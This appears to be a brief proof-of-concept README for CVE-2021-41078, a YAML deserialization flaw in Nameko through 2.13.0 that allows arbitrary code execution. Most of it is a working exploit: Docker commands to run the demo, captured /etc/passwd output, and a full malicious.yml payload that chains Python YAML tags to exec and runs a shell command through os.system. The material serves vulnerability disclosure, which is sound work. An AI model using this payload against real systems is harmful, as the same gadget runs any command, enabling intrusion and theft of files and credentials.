nameko Arbitrary code execution due to YAML deserialization
Nameko through 2.13.0 can be tricked into performing arbitrary code execution when deserializing the config file.
- Build an image from a Dockerfile
docker build -t cve-2021-41078 .
- Run python main.py in a new container
docker run -it --rm cve-2021-41078
output /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --
malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"